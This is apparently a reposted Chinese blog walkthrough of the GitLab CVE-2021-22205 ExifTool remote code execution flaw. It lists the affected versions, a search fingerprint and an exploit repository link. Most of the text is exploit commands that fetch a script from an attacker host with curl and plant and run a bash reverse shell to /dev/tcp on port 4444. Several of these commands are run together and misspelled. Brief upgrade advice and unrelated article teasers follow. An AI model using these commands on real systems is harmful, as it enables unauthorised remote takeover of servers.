摘要:免责声明本文档供学习,请使用者注意使用环境并遵守国家相关法律法规由于使用不当造成的后果上传者概不负责摘抄为世界进文明,为人类造幸福,以青春之我,创建青春之家庭,青春之国家,青春之民族,青春之人类,青春之地球,青春之宇宙,资以乐其无涯之生。
该漏洞CVSS评分:9.9
危害等级:严重
11.9 <= Gitlab CE/EE < 13.8.8
13.9 <= Gitlab CE/EE < 13.9.6
13.10 <= Gitlab CE/EE < 13.10.3
app="GitLab"
https://github.com/Al1ex/CVE-2021-22205
python CVE-2021-22205.py -v true -t http://192.168.253.134:8080
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "ping "
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "curl http://192.168.59.1:1234/1.sh"python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "test > /tmp/1.txt"
python CVE-2021-22205.py -a true -t http://192.168.253.134:8080/ -c "echo "bash -i >& /dev/tcp/192.168.253.128/4444 0>&1" > /tmp/1.shpython CVE-2021-22205.py -a true -t http://192.168.253.134:8080/ -c "chmod +x /tmp/1.sh"python3 CVE-2021-2205.py -a true -t http://192.168.253.134:8080/ -c "/bin/bahs /tmp/1.sh"
目前官方已发布新版本修复了该漏洞,请受影响的用户尽快升级至最新版本进行防护,
官方下载链接:https://about.gitlab.com/update/
若相关用户暂时无法进行升级操作,可使用白名单限制对Web端口的访问。
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责
为世界进文明,为人类造幸福,
以青春之我,创建青春之家庭,青春之国家,
青春之民族,青春之人类,青春之地球,
青春之宇宙,资以乐其无涯之生。
– 李大钊 《觉醒年代》
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/123538.html
摘要:源码分析漏洞复现访问输入认证登录请求,表达式已成功执行并返回结果。漏洞分析大多数仅支持请求并仅显示敏感的配置数据,如果使用了不当的端点,可能会产生甚至是安全问题。 ...
摘要:发布的分析写道。尽管补丁已经公开发布了个多月,但在个面向互联网的安装中的安装已经针对这个问题打了完整的补丁。的安装可能存在或不存在漏洞。此外,理想情况下,不应该是面向的服务。 尽管该漏洞最初被认为是经过身份验证的RCE 案例并分配了9.9的CVSS评分,但由于未经身份验证的威胁行为者也可能触发该漏洞,因此严重性评级在2021年9月21日修订为10.0。 该漏洞存在于ExifToo...
摘要:目录简介靶场环境漏洞复现一手工复现二图形化工具简介是一个强大易用的安全框架,提供了认证授权加密和会话管理等功能。 目录 简介:靶场环境漏洞复现一、手工复现二、图形...
摘要:将的动态功能和标准的安全性引入大型网络应用的开发集成部署和管理之中。使用这两个漏洞组成的利用链,可通过一个请求在远程服务器上以未授权的任意用户身份执行命令。这个漏洞的利用方式有两种,一是通过,二是通过。 一、软件介绍 WebLogic是美国Oracle公司出品的一个application s...
摘要:在当前页面抓包后修改内容,写入冰蝎脚本文件。添加的内容为实现反弹。影响范围相关漏洞有复现过程环境这里先使用扫描一下是否开启了服务。使用工具写入。 目录 简介Web...
阅读 4092·2021-11-17 09:33
阅读 1525·2021-10-18 13:30
阅读 2292·2021-10-09 10:02
阅读 2694·2021-09-28 09:35
阅读 1333·2021-09-02 15:34
阅读 763·2019-08-27 14:19
阅读 1231·2019-08-27 14:19
阅读 1926·2019-08-26 13:39